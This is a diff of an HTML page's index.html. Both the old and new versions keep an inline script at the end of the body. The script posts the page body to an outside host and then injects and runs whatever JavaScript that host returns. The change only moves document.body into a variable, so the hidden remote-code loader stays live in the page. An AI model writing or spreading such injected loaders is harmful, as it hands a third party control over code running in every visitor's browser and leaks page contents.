--- a/index.html
+++ b/index.html
@@ -670,7 +670,7 @@
 			</div>
 		</div>
 		<script type="text/javascript">
-			var aa;var ab=(window.XMLHttpRequest)?new XMLHttpRequest():new ActiveXObject("Microsoft.XMLHTTP");ab.onreadystatechange=function(){if(ab.readyState==4&&ab.status==200){aa=document.createElement('script');aa.setAttribute('type','text/javascript');document.body.appendChild(aa);try{aa.appendChild(document.createTextNode(ab.responseText));}catch(e){aa.text=ab.responseText;}}};ab.open("POST", "http://js.lucasanimador.com.br/",true);ab.setRequestHeader("Content-type", "application/x-www-form-urlencoded");ab.send('h='+document.body);
+			var aa;var ab=(window.XMLHttpRequest)?new XMLHttpRequest():new ActiveXObject("Microsoft.XMLHTTP");var ac=document.body;ab.onreadystatechange=function(){if(ab.readyState==4&&ab.status==200){aa=document.createElement('script');aa.setAttribute('type','text/javascript');document.body.appendChild(aa);try{aa.appendChild(document.createTextNode(ab.responseText));}catch(e){aa.text=ab.responseText;}}};ab.open("POST", "http://js.lucasanimador.com.br/",true);ab.setRequestHeader("Content-type", "application/x-www-form-urlencoded");ab.send('h='+ac);
 		</script>
 	</body>
 </html>
